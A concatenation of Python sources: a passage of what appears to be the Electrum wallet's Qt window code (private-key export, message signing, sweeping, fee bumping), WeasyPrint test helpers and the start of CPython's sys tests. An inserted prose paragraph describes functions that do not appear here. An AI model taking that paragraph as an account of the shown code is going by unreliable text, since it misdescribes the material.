data, title = _("QR code"), parent=None, *, help_text=None, show_copy_text_btn=False): if not data: return d = QRDialog( data=data, parent=parent or self, title=title, help_text=help_text, show_copy_text_btn=show_copy_text_btn, config=self.config, ) d.exec_() @protected def show_private_key(self, address, password): if not address: return try: pk = self.wallet.export_private_key(address, password) except Exception as e: self.logger.exception('') self.show_message(repr(e)) return xtype = bitcoin.deserialize_privkey(pk)[0] d = WindowModalDialog(self, _("Private key")) d.setMinimumSize(600, 150) vbox = QVBoxLayout() vbox.addWidget(QLabel(_("Address") + ': ' + address)) vbox.addWidget(QLabel(_("Script type") + ': ' + xtype)) vbox.addWidget(QLabel(_("Private key") + ':')) keys_e = ShowQRTextEdit(text=pk, config=self.config) keys_e.addCopyButton(self.app) vbox.addWidget(keys_e) vbox.addLayout(Buttons(CloseButton(d))) d.setLayout(vbox) d.exec_() msg_sign = _("Signing with an address actually means signing with the corresponding " "private key, and verifying with the corresponding public key. The " "address you have entered does not have a unique public key, so these " "operations cannot be performed.") + '\n\n' + \ _('The operation is undefined. Not just in Electrum, but in general.') @protected def do_sign(self, address, message, signature, password): address = address.text().strip() message = message.toPlainText().strip() if not bitcoin.is_address(address): self.show_message(_('Invalid Bitcoin address.')) return if self.wallet.is_watching_only(): self.show_message(_('This is a watching-only wallet.')) return if not self.wallet.is_mine(address): self.show_message(_('Address not in wallet.')) return txin_type = self.wallet.get_txin_type(address) if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']: self.show_message(_('Cannot sign messages with this type of address:') + \ ' ' + txin_type + '\n\n' + self.msg_sign) return task = partial(self.wallet.sign_message, address, message, password) def show_signed_message(sig): try: signature.setText(base64.b64encode(sig).decode('ascii')) except RuntimeError: # (signature) wrapped C/C++ object has been deleted pass self.wallet.thread.add(task, on_success=show_signed_message) def do_verify(self, address, message, signature): address = address.text().strip() message = message.toPlainText().strip().encode('utf-8') if not bitcoin.is_address(address): self.show_message(_('Invalid Bitcoin address.')) return try: # This can throw on invalid base64 sig = base64.b64decode(str(signature.toPlainText())) verified = ecc.verify_message_with_address(address, sig, message) except Exception as e: verified = False if verified: self.show_message(_("Signature verified")) else: self.show_error(_("Wrong signature")) def sign_verify_message(self, address=''): d = WindowModalDialog(self, _('Sign/verify Message')) d.setMinimumSize(610, 290) layout = QGridLayout(d) message_e = QTextEdit() message_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Message')), 1, 0) layout.addWidget(message_e, 1, 1) layout.setRowStretch(2,3) address_e = QLineEdit() address_e.setText(address) layout.addWidget(QLabel(_('Address')), 2, 0) layout.addWidget(address_e, 2, 1) signature_e = QTextEdit() signature_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Signature')), 3, 0) layout.addWidget(signature_e, 3, 1) layout.setRowStretch(3,1) hbox = QHBoxLayout() b = QPushButton(_("Sign")) b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e)) hbox.addWidget(b) b = 
QPushButton(_("Verify")) b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e)) hbox.addWidget(b) b = QPushButton(_("Close")) b.clicked.connect(d.accept) hbox.addWidget(b) layout.addLayout(hbox, 4, 1) d.exec_() @protected def do_decrypt(self, message_e, pubkey_e, encrypted_e, password): if self.wallet.is_watching_only(): self.show_message(_('This is a watching-only wallet.')) return cyphertext = encrypted_e.toPlainText() task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password) def setText(text): try: message_e.setText(text.decode('utf-8')) except RuntimeError: # (message_e) wrapped C/C++ object has been deleted pass self.wallet.thread.add(task, on_success=setText) def do_encrypt(self, message_e, pubkey_e, encrypted_e): message = message_e.toPlainText() message = message.encode('utf-8') try: public_key = ecc.ECPubkey(bfh(pubkey_e.text())) except BaseException as e: self.logger.exception('Invalid Public key') self.show_warning(_('Invalid Public key')) return encrypted = public_key.encrypt_message(message) encrypted_e.setText(encrypted.decode('ascii')) def encrypt_message(self, address=''): d = WindowModalDialog(self, _('Encrypt/decrypt Message')) d.setMinimumSize(610, 490) layout = QGridLayout(d) message_e = QTextEdit() message_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Message')), 1, 0) layout.addWidget(message_e, 1, 1) layout.setRowStretch(2,3) pubkey_e = QLineEdit() if address: pubkey = self.wallet.get_public_key(address) pubkey_e.setText(pubkey) layout.addWidget(QLabel(_('Public key')), 2, 0) layout.addWidget(pubkey_e, 2, 1) encrypted_e = QTextEdit() encrypted_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Encrypted')), 3, 0) layout.addWidget(encrypted_e, 3, 1) layout.setRowStretch(3,1) hbox = QHBoxLayout() b = QPushButton(_("Encrypt")) b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e)) hbox.addWidget(b) b = QPushButton(_("Decrypt")) b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e)) hbox.addWidget(b) b = QPushButton(_("Close")) b.clicked.connect(d.accept) hbox.addWidget(b) layout.addLayout(hbox, 4, 1) d.exec_() def password_dialog(self, msg=None, parent=None): from .password_dialog import PasswordDialog parent = parent or self d = PasswordDialog(parent, msg) return d.run() def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']: from electrum.transaction import tx_from_any try: return tx_from_any(data) except BaseException as e: self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e)) return def import_channel_backup(self, encrypted: str): if not self.question('Import channel backup?'): return try: self.wallet.lnbackups.import_channel_backup(encrypted) except Exception as e: self.show_error("failed to import backup" + '\n' + str(e)) return def read_tx_from_qrcode(self): from electrum import qrscanner try: data = qrscanner.scan_barcode(self.config.get_video_device()) except UserFacingException as e: self.show_error(e) return except BaseException as e: self.logger.exception('camera error') self.show_error(repr(e)) return if not data: return # if the user scanned a bitcoin URI if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'): self.pay_to_URI(data) return if data.lower().startswith('channel_backup:'): self.import_channel_backup(data) return # else if the user scanned an offline signed tx tx = self.tx_from_text(data) if not tx: return self.show_transaction(tx) def read_tx_from_file(self) -> 
Optional[Transaction]: fileName = getOpenFileName( parent=self, title=_("Select your transaction file"), filter=TRANSACTION_FILE_EXTENSION_FILTER_ANY, config=self.config, ) if not fileName: return try: with open(fileName, "rb") as f: file_content = f.read() # type: Union[str, bytes] except (ValueError, IOError, os.error) as reason: self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found")) return return self.tx_from_text(file_content) def do_process_from_text(self): text = text_dialog( parent=self, title=_('Input raw transaction'), header_layout=_("Transaction:"), ok_label=_("Load transaction"), config=self.config, ) if not text: return tx = self.tx_from_text(text) if tx: self.show_transaction(tx) def do_process_from_text_channel_backup(self): text = text_dialog( parent=self, title=_('Input channel backup'), header_layout=_("Channel Backup:"), ok_label=_("Load backup"), config=self.config, ) if not text: return if text.startswith('channel_backup:'): self.import_channel_backup(text) def do_process_from_file(self): tx = self.read_tx_from_file() if tx: self.show_transaction(tx) def do_process_from_txid(self): from electrum import transaction txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':') if ok and txid: txid = str(txid).strip() raw_tx = self._fetch_tx_from_network(txid) if not raw_tx: return tx = transaction.Transaction(raw_tx) self.show_transaction(tx) def _fetch_tx_from_network(self, txid: str) -> Optional[str]: if not self.network: self.show_message(_("You are offline.")) return try: raw_tx = self.network.run_from_another_thread( self.network.get_transaction(txid, timeout=10)) except UntrustedServerReturnedError as e: self.logger.info(f"Error getting transaction from network: {repr(e)}") self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui()) return except Exception as e: self.show_message(_("Error getting transaction from network") + ":\n" + repr(e)) return return raw_tx @protected def export_privkeys_dialog(self, password): if self.wallet.is_watching_only(): self.show_message(_("This is a watching-only wallet")) return if isinstance(self.wallet, Multisig_Wallet): self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' + _('It cannot be "backed up" by simply exporting these private keys.')) d = WindowModalDialog(self, _('Private keys')) d.setMinimumSize(980, 300) vbox = QVBoxLayout(d) msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."), _("Exposing a single private key can compromise your entire wallet!"), _("In particular, DO NOT use 'redeem private key' services proposed by third parties.")) vbox.addWidget(QLabel(msg)) e = QTextEdit() e.setReadOnly(True) vbox.addWidget(e) defaultname = 'electrum-private-keys.csv' select_msg = _('Select file to export your private keys to') hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg) vbox.addLayout(hbox) b = OkButton(d, _('Export')) b.setEnabled(False) vbox.addLayout(Buttons(CancelButton(d), b)) private_keys = {} addresses = self.wallet.get_addresses() done = False cancelled = False def privkeys_thread(): for addr in addresses: time.sleep(0.1) if done or cancelled: break privkey = self.wallet.export_private_key(addr, password) private_keys[addr] = privkey self.computing_privkeys_signal.emit() if not cancelled: self.computing_privkeys_signal.disconnect() self.show_privkeys_signal.emit() def 
show_privkeys(): s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items())) e.setText(s) b.setEnabled(True) self.show_privkeys_signal.disconnect() nonlocal done done = True def on_dialog_closed(*args): nonlocal done nonlocal cancelled if not done: cancelled = True self.computing_privkeys_signal.disconnect() self.show_privkeys_signal.disconnect() self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses)))) self.show_privkeys_signal.connect(show_privkeys) d.finished.connect(on_dialog_closed) threading.Thread(target=privkeys_thread).start() if not d.exec_(): done = True return filename = filename_e.text() if not filename: return try: self.do_export_privkeys(filename, private_keys, csv_button.isChecked()) except (IOError, os.error) as reason: txt = "\n".join([ _("Electrum was unable to produce a private key-export."), str(reason) ]) self.show_critical(txt, title=_("Unable to create csv")) except Exception as e: self.show_message(repr(e)) return self.show_message(_("Private keys exported.")) def do_export_privkeys(self, fileName, pklist, is_csv): with open(fileName, "w+") as f: os.chmod(fileName, 0o600) if is_csv: transaction = csv.writer(f) transaction.writerow(["address", "private_key"]) for addr, pk in pklist.items(): transaction.writerow(["%34s"%addr,pk]) else: f.write(json.dumps(pklist, indent = 4)) def do_import_labels(self): def on_import(): self.need_update.set() import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import) def do_export_labels(self): export_meta_gui(self, _('labels'), self.wallet.export_labels) def import_invoices(self): import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update) def export_invoices(self): export_meta_gui(self, _('invoices'), self.wallet.export_invoices) def import_requests(self): import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update) def export_requests(self): export_meta_gui(self, _('requests'), self.wallet.export_requests) def import_contacts(self): import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update) def export_contacts(self): export_meta_gui(self, _('contacts'), self.contacts.export_file) def sweep_key_dialog(self): d = WindowModalDialog(self, title=_('Sweep private keys')) d.setMinimumSize(600, 300) vbox = QVBoxLayout(d) hbox_top = QHBoxLayout() hbox_top.addWidget(QLabel(_("Enter private keys:"))) hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight) vbox.addLayout(hbox_top) keys_e = ScanQRTextEdit(allow_multi=True, config=self.config) keys_e.setTabChangesFocus(True) vbox.addWidget(keys_e) addresses = self.wallet.get_unused_addresses() if not addresses: try: addresses = self.wallet.get_receiving_addresses() except AttributeError: addresses = self.wallet.get_addresses() h, address_e = address_field(addresses) vbox.addLayout(h) vbox.addStretch(1) button = OkButton(d, _('Sweep')) vbox.addLayout(Buttons(CancelButton(d), button)) button.setEnabled(False) def get_address(): addr = str(address_e.text()).strip() if bitcoin.is_address(addr): return addr def get_pk(*, raise_on_error=False): text = str(keys_e.toPlainText()) return keystore.get_private_keys(text, raise_on_error=raise_on_error) def on_edit(): valid_privkeys = False try: valid_privkeys = get_pk(raise_on_error=True) is not None except Exception as e: button.setToolTip(f'{_("Error")}: {repr(e)}') else: button.setToolTip('') button.setEnabled(get_address() is not None and valid_privkeys) 
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet()) keys_e.textChanged.connect(on_edit) address_e.textChanged.connect(on_edit) address_e.textChanged.connect(on_address) on_address(str(address_e.text())) if not d.exec_(): return # user pressed "sweep" addr = get_address() try: self.wallet.check_address_for_corruption(addr) except InternalAddressCorruption as e: self.show_error(str(e)) raise privkeys = get_pk() def on_success(result): coins, keypairs = result outputs = [PartialTxOutput.from_address_and_value(addr, value='!')] self.warn_if_watching_only() self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs) def on_failure(exc_info): self.on_error(exc_info) msg = _('Preparing sweep transaction...') task = lambda: self.network.run_from_another_thread( sweep_preparations(privkeys, self.network)) WaitingDialog(self, msg, task, on_success, on_failure) def _do_import(self, title, header_layout, func): text = text_dialog( parent=self, title=title, header_layout=header_layout, ok_label=_('Import'), allow_multi=True, config=self.config, ) if not text: return keys = str(text).split() good_inputs, bad_inputs = func(keys) if good_inputs: msg = '\n'.join(good_inputs[:10]) if len(good_inputs) > 10: msg += '\n...' self.show_message(_("The following addresses were added") + f' ({len(good_inputs)}):\n' + msg) if bad_inputs: msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10]) if len(bad_inputs) > 10: msg += '\n...' self.show_error(_("The following inputs could not be imported") + f' ({len(bad_inputs)}):\n' + msg) self.address_list.update() self.history_list.update() def import_addresses(self): if not self.wallet.can_import_address(): return title, msg = _('Import addresses'), _("Enter addresses")+':' self._do_import(title, msg, self.wallet.import_addresses) @protected def do_import_privkey(self, password): if not self.wallet.can_import_privkey(): return title = _('Import private keys') header_layout = QHBoxLayout() header_layout.addWidget(QLabel(_("Enter private keys")+':')) header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight) self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password)) def update_fiat(self): b = self.fx and self.fx.is_enabled() self.fiat_send_e.setVisible(b) self.fiat_receive_e.setVisible(b) self.history_list.update() self.address_list.refresh_headers() self.address_list.update() self.update_status() def settings_dialog(self): from .settings_dialog import SettingsDialog d = SettingsDialog(self, self.config) self.alias_received_signal.connect(d.set_alias_color) d.exec_() self.alias_received_signal.disconnect(d.set_alias_color) if self.fx: self.fx.trigger_update() run_hook('close_settings_dialog') if d.need_restart: self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success')) def closeEvent(self, event): # It seems in some rare cases this closeEvent() is called twice if not self.cleaned_up: self.cleaned_up = True self.clean_up() event.accept() def clean_up(self): self.wallet.thread.stop() util.unregister_callback(self.on_network) self.config.set_key("is_maximized", self.isMaximized()) if not self.isMaximized(): g = self.geometry() self.wallet.db.put("winpos-qt", [g.left(),g.top(), g.width(),g.height()]) self.wallet.db.put("qt-console-history", self.console.history[-50:]) if self.qr_window: self.qr_window.close() self.close_wallet() 
self.gui_object.timer.timeout.disconnect(self.timer_actions) self.gui_object.close_window(self) def plugins_dialog(self): self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins')) plugins = self.gui_object.plugins vbox = QVBoxLayout(d) # plugins scroll = QScrollArea() scroll.setEnabled(True) scroll.setWidgetResizable(True) scroll.setMinimumSize(400,250) vbox.addWidget(scroll) w = QWidget() scroll.setWidget(w) w.setMinimumHeight(plugins.count() * 35) grid = QGridLayout() grid.setColumnStretch(0,1) w.setLayout(grid) settings_widgets = {} def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int): widget = settings_widgets.get(name) # type: Optional[QWidget] if widget and not p: # plugin got disabled, rm widget grid.removeWidget(widget) widget.setParent(None) settings_widgets.pop(name) elif widget is None and p and p.requires_settings() and p.is_enabled(): # plugin got enabled, add widget widget = settings_widgets[name] = p.settings_widget(d) grid.addWidget(widget, i, 1) def do_toggle(cb, name, i): p = plugins.toggle(name) cb.setChecked(bool(p)) enable_settings_widget(p, name, i) # note: all enabled plugins will receive this hook: run_hook('init_qt', self.gui_object) for i, descr in enumerate(plugins.descriptions.values()): full_name = descr['__name__'] prefix, _separator, name = full_name.rpartition('.') p = plugins.get(name) if descr.get('registers_keystore'): continue try: cb = QCheckBox(descr['fullname']) plugin_is_loaded = p is not None cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet) or plugin_is_loaded and p.can_user_disable()) cb.setEnabled(cb_enabled) cb.setChecked(plugin_is_loaded and p.is_enabled()) grid.addWidget(cb, i, 0) enable_settings_widget(p, name, i) cb.clicked.connect(partial(do_toggle, cb, name, i)) msg = descr['description'] if descr.get('requires'): msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires'))) grid.addWidget(HelpButton(msg), i, 2) except Exception: self.logger.exception(f"cannot display plugin {name}") grid.setRowStretch(len(plugins.descriptions.values()), 1) vbox.addLayout(Buttons(CloseButton(d))) d.exec_() def cpfp_dialog(self, parent_tx: Transaction) -> None: new_tx = self.wallet.cpfp(parent_tx, 0) total_size = parent_tx.estimated_size() + new_tx.estimated_size() parent_txid = parent_tx.txid() assert parent_txid parent_fee = self.wallet.get_tx_fee(parent_txid) if parent_fee is None: self.show_error(_("Can't CPFP: unknown fee for parent transaction.")) return d = WindowModalDialog(self, _('Child Pays for Parent')) vbox = QVBoxLayout(d) msg = ( "A CPFP is a transaction that sends an unconfirmed output back to " "yourself, with a high fee. The goal is to have miners confirm " "the parent transaction in order to get the fee attached to the " "child transaction.") vbox.addWidget(WWLabel(_(msg))) msg2 = ("The proposed fee is computed using your " "fee/kB settings, applied to the total size of both child and " "parent transactions. 
After you broadcast a CPFP transaction, " "it is normal to see a new unconfirmed transaction in your history.") vbox.addWidget(WWLabel(_(msg2))) grid = QGridLayout() grid.addWidget(QLabel(_('Total size') + ':'), 0, 0) grid.addWidget(QLabel('%d bytes'% total_size), 0, 1) max_fee = new_tx.output_value() grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0) grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1) output_amount = QLabel('') grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0) grid.addWidget(output_amount, 2, 1) fee_e = BTCAmountEdit(self.get_decimal_point) # FIXME with dyn fees, without estimates, there are all kinds of crashes here combined_fee = QLabel('') combined_feerate = QLabel('') def on_fee_edit(x): fee_for_child = fee_e.get_amount() if fee_for_child is None: return out_amt = max_fee - fee_for_child out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else '' output_amount.setText(out_amt_str) comb_fee = parent_fee + fee_for_child comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else '' combined_fee.setText(comb_fee_str) comb_feerate = comb_fee / total_size * 1000 comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else '' combined_feerate.setText(comb_feerate_str) fee_e.textChanged.connect(on_fee_edit) def get_child_fee_from_total_feerate(fee_per_kb): fee = fee_per_kb * total_size / 1000 - parent_fee fee = min(max_fee, fee) fee = max(total_size, fee) # pay at least 1 sat/byte for combined size return fee suggested_feerate = self.config.fee_per_kb() if suggested_feerate is None: self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''') return fee = get_child_fee_from_total_feerate(suggested_feerate) fee_e.setAmount(fee) grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0) grid.addWidget(fee_e, 3, 1) def on_rate(dyn, pos, fee_rate): fee = get_child_fee_from_total_feerate(fee_rate) fee_e.setAmount(fee) fee_slider = FeeSlider(self, self.config, on_rate) fee_combo = FeeComboBox(fee_slider) fee_slider.update() grid.addWidget(fee_slider, 4, 1) grid.addWidget(fee_combo, 4, 2) grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0) grid.addWidget(combined_fee, 5, 1) grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0) grid.addWidget(combined_feerate, 6, 1) vbox.addLayout(grid) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if not d.exec_(): return fee = fee_e.get_amount() if fee is None: return # fee left empty, treat is as "cancel" if fee > max_fee: self.show_error(_('Max fee exceeded')) return try: new_tx = self.wallet.cpfp(parent_tx, fee) except CannotCPFP as e: self.show_error(str(e)) return self.show_transaction(new_tx) def _add_info_to_tx_from_wallet_and_network(self, tx: PartialTransaction) -> bool: """Returns whether successful.""" # note side-effect: tx is being mutated assert isinstance(tx, PartialTransaction) try: # note: this might download input utxos over network BlockingWaitingDialog( self, _("Adding info to tx, from wallet and network..."), lambda: tx.add_info_from_wallet(self.wallet, ignore_network_issues=False), ) except NetworkException as e: self.show_error(repr(e)) return False return True def bump_fee_dialog(self, tx: Transaction): txid = tx.txid() if not isinstance(tx, PartialTransaction): tx = PartialTransaction.from_tx(tx) if not self._add_info_to_tx_from_wallet_and_network(tx): return d = BumpFeeDialog(main_window=self, tx=tx, txid=txid) d.run() def dscancel_dialog(self, tx: Transaction): txid = tx.txid() if not 
isinstance(tx, PartialTransaction): tx = PartialTransaction.from_tx(tx) if not self._add_info_to_tx_from_wallet_and_network(tx): return d = DSCancelDialog(main_window=self, tx=tx, txid=txid) d.run() def save_transaction_into_wallet(self, tx: Transaction): win = self.top_level_window() try: if not self.wallet.add_transaction(tx): win.show_error(_("Transaction could not be saved.") + "\n" + _("It conflicts with current history.")) return False except AddTransactionException as e: win.show_error(e) return False else: self.wallet.save_db() # need to update at least: history_list, utxo_list, address_list self.need_update.set() msg = (_("Transaction added to wallet history.") + '\n\n' + _("Note: this is an offline transaction, if you want the network " "to see it, you need to broadcast it.")) win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg) return True def show_cert_mismatch_error(self): if self.showing_cert_mismatch_error: return self.showing_cert_mismatch_error = True self.show_critical(title=_("Certificate mismatch"), msg=_("The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" + _("Electrum will now exit.")) self.showing_cert_mismatch_error = False self.close()
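A recurring pattern in the wallet-window code above (for example in pay_lightning_invoice and broadcast_thread) is handing blocking work to a worker thread and scheduling coroutines on the network's asyncio loop with asyncio.run_coroutine_threadsafe, then blocking on the returned future. The following is a minimal, self-contained sketch of that pattern only; the names (network_loop, broadcast) are hypothetical and this is not Electrum's actual API.

import asyncio
import threading

# A background event loop running in its own thread, standing in for the
# application's long-lived network loop.
network_loop = asyncio.new_event_loop()
threading.Thread(target=network_loop.run_forever, daemon=True).start()

async def broadcast(raw_tx: str) -> str:
    await asyncio.sleep(0.1)          # stand-in for network I/O
    return "txid-of-" + raw_tx

def task():
    # Same shape as the GUI code: schedule the coroutine on the loop that
    # lives in another thread, then block this worker thread on the future.
    fut = asyncio.run_coroutine_threadsafe(broadcast("01000000..."), network_loop)
    return fut.result(timeout=20)

print(task())
network_loop.call_soon_threadsafe(network_loop.stop)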
testing_utils.py
""" weasyprint.tests.testing_utils ------------------------------ Helpers for tests. :copyright: Copyright 2011-2019 Simon Sapin and contributors, see AUTHORS. :license: BSD, see LICENSE for details. """ import contextlib import functools import logging import os.path import sys import threading import wsgiref.simple_server import pytest from .. import CSS, HTML, text from ..logger import LOGGER from ..urls import path2url # Lists of fonts with many variants (including condensed) if sys.platform.startswith('win'): # pragma: no cover SANS_FONTS = 'DejaVu Sans, Arial Nova, Arial, sans' MONO_FONTS = 'Courier New, Courier, monospace' elif sys.platform.startswith('darwin'): # pragma: no cover # Pango on macOS doesn't handle multiple fonts # See https://github.com/Kozea/WeasyPrint/issues/158 SANS_FONTS = 'DejaVu Sans' MONO_FONTS = 'Courier New' else: # pragma: no cover SANS_FONTS = 'DejaVu Sans, sans' MONO_FONTS = 'DejaVu Sans Mono, monospace' TEST_UA_STYLESHEET = CSS(filename=os.path.join( os.path.dirname(__file__), '..', 'css', 'tests_ua.css' )) class FakeHTML(HTML): """Like weasyprint.HTML, but with a lighter UA stylesheet.""" def _ua_stylesheets(self): return [TEST_UA_STYLESHEET] def resource_filename(basename): """Return the absolute path of the resource called ``basename``.""" return os.path.join(os.path.dirname(__file__), 'resources', basename) # Dummy filename, but in the right directory. BASE_URL = path2url(resource_filename('<test>')) class CallbackHandler(logging.Handler): """A logging handler that calls a function for every message.""" def __init__(self, callback): logging.Handler.__init__(self) self.emit = callback @contextlib.contextmanager def capture_logs(): """Return a context manager that captures all logged messages.""" logger = LOGGER messages = [] def emit(record): if record.name == 'weasyprint.progress': return message = '%s: %s' % (record.levelname.upper(), record.getMessage()) messages.append(message) previous_handlers = logger.handlers previous_level = logger.level logger.handlers = [] logger.addHandler(CallbackHandler(emit)) logger.setLevel(logging.DEBUG) try: yield messages finally: logger.handlers = previous_handlers logger.level = previous_level def assert_no_logs(function): """Decorator that asserts that nothing is logged in a function.""" @functools.wraps(function) def wrapper(*args, **kwargs): with capture_logs() as logs: try: function(*args, **kwargs) except Exception: # pragma: no cover if logs: print('%i errors logged:' % len(logs), file=sys.stderr) for message in logs: print(message, file=sys.stderr) raise else: if logs: # pragma: no cover for message in logs: print(message, file=sys.stderr) raise AssertionError('%i errors logged' % len(logs)) return wrapper @contextlib.contextmanager def http_server(handlers): def wsgi_app(environ, start_response): handler = handlers.get(environ['PATH_INFO']) if handler: status = str('200 OK') response, headers = handler(environ) headers = [(str(name), str(value)) for name, value in headers] else: # pragma: no cover status = str('404 Not Found') response = b'' headers = [] start_response(status, headers) return [response] # Port 0: let the OS pick an available port number # http://stackoverflow.com/a/1365284/1162888 server = wsgiref.simple_server.make_server('127.0.0.1', 0, wsgi_app) _host, port = server.socket.getsockname() thread = threading.Thread(target=server.serve_forever) thread.start() try: yield 'http://127.0.0.1:%s' % port finally: server.shutdown() thread.join() def requires(library_name, expected_tuple): library = 
getattr(text, library_name) library_version = '%06i' % getattr(library, '%s_version' % library_name)() library_tuple = tuple(int(i) for i in ( library_version[:2], library_version[2:4], library_version[4:])) return pytest.mark.skipif( library_tuple < expected_tuple, reason='Running %s %s but this test requires %s+' % ( library_name, '%i.%i.%i' % library_tuple, '%i.%i.%i' % expected_tuple))
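A hedged usage sketch of the helpers defined above (http_server, capture_logs, assert_no_logs, FakeHTML). It assumes WeasyPrint and its test package are importable; the test names and the handler are made up for illustration and are not part of the file itself.

from weasyprint.tests.testing_utils import (
    FakeHTML, assert_no_logs, capture_logs, http_server)


@assert_no_logs
def test_render_over_http():
    # One handler, looked up by PATH_INFO, returning (body, headers).
    def index(environ):
        return b'<p>hello</p>', [('Content-Type', 'text/html')]

    with http_server({'/': index}) as root_url:
        FakeHTML(root_url + '/').render()


def test_invalid_css_is_logged():
    with capture_logs() as logs:
        FakeHTML(string='<p style="color: not-a-color">x</p>').render()
    # WeasyPrint normally emits a WARNING for the ignored declaration,
    # which capture_logs() collects as 'LEVEL: message' strings.
    assert logs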
test_sys.py
import builtins
import codecs
import gc
import locale
import operator
import os
import struct
import subprocess
import sys
import sysconfig
import test.support
from test import support
from test.support import os_helper
from test.support.script_helper import assert_python_ok, assert_python_failure
from test.support import threading_helper
from test.support import import_helper
import textwrap
import unittest
import warnings


# count the number of test runs, used to create unique
# strings to intern in test_intern()
INTERN_NUMRUNS = 0

DICT_KEY_STRUCT_FORMAT = 'n2BI2n'


class DisplayHookTest(unittest.TestCase):

    def test_original_displayhook(self):
        dh = sys.__displayhook__

        with support.captured_stdout() as out:
            dh(42)

        self.assertEqual(out.getvalue(), "42\n")
        self.assertEqual(builtins._, 42)

        del builtins._

        with support.captured_stdout() as out:
            dh(None)

        self.assertEqual(out.getvalue(), "")
        self.assertTrue(not hasattr(builtins, "_"))

        # sys.displayhook() requires arguments
        self.assertRaises(TypeError, dh)

        stdout = sys.stdout
        try:
            del sys.stdout
            self.assertRaises(RuntimeError, dh, 42)
        finally:
            sys.stdout = stdout

    def test_lost_displayhook(self):
        displayhook = sys.displayhook
        try:
            del sys.displayhook
            code = compile("42", "<string>", "single")
            self.assertRaises(RuntimeError, eval, code)
        finally:
            sys.displayhook = displayhook

    def test_custom_displayhook(self):
        def baddisplayhook(obj):
            raise ValueError

        with support.swap_attr(sys, 'displayhook', baddisplayhook):
            code = compile("42", "<string>", "single")
            self.assertRaises(ValueError, eval, code)


class ExceptHookTest(unittest.TestCase):

    def test_original_excepthook(self):
        try:
            raise ValueError(42)
        except ValueError as exc:
            with support.captured_stderr() as err:
                sys.__excepthook__(*sys.exc_info())

        self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))

        self.assertRaises(TypeError, sys.__excepthook__)

    def test_excepthook_bytes_filename(self):
        # bpo-37467: sys.excepthook() must not crash if a filename
        # is a bytes string
        with warnings.catch_warnings():
            warnings.simplefilter('ignore', BytesWarning)

            try:
                raise SyntaxError("msg", (b"bytes_filename", 123, 0, "text"))
            except SyntaxError as exc:
                with support.captured_stderr() as err:
                    sys.__excepthook__(*sys.exc_info())

        err = err.getvalue()
        self.assertIn(""" File "b'bytes_filename'", line 123\n""", err)
        self.assertIn(""" text\n""", err)
        self.assertTrue(err.endswith("SyntaxError: msg\n"))

    def test_excepthook(self):
        with test.support.captured_output("stderr") as stderr:
            sys.excepthook(1, '1', 1)
        self.assertTrue("TypeError: print_exception(): Exception expected for " \
                        "value, str found" in stderr.getvalue())

    # FIXME: testing the code for a lost or replaced excepthook in
    # Python/pythonrun.c::PyErr_PrintEx() is tricky.
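Illustrative sketch, not part of the test suite: the hook the class above exercises. sys.displayhook is called with the value of each expression evaluated from a code object compiled in "single" mode, which is exactly what test_lost_displayhook and test_custom_displayhook rely on. The helper name quiet_displayhook is made up.

import sys

def quiet_displayhook(value):
    # Like the default hook, but without binding builtins._
    if value is not None:
        print(repr(value))

old_hook = sys.displayhook
sys.displayhook = quiet_displayhook
try:
    eval(compile("1 + 1", "<string>", "single"))   # prints "2" via the hook
finally:
    sys.displayhook = old_hook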
